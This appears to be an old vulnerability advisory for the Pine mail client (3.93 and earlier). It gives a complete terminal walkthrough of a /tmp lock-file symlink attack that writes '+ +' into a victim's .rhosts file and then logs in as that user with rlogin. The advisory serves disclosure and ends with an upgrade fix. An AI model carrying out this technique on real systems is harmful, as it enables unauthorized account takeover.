COMMAND
Pine 3.93 and earlier
SYSTEMS AFFECTED
Linux Slackware 3.0, Slackware 3.1, and Slackware derived systems.
Non-upgraded Red Hat systems.
PROBLEM
Pine creates a lock file in /tmp that is easily guessed and the
premissions are set read/write for User, Group, Other. This the
file can be linked to /$USER/.rhosts and then written too.
By watching the process table with ps to see which users are
running PINE, one can then do an ls in /tmp/ to gather the
lockfile names for each user. Watching the process table once
again will now reveal when each user quits PINE or runs out of
unread messages in their INBOX, effectively deleting the
respective lockfile.
Creating a symbolic link from /tmp/.hamors_lockfile to
~hamors/.rhosts (for a generic example) will cause PINE to create
~hamors/.rhosts as a 666 file with PINE's process id as its
contents. One may now simply do an echo "+ +" >
/tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.
For this example, hamors is the victim while catluvr is the
attacker:
hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
- - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4
catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine
catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
hamors (23 19:09) litterbox:~> pine
catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +
catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
SOLUTION
Disable Pine and quickly upgrade Pine to 3.95.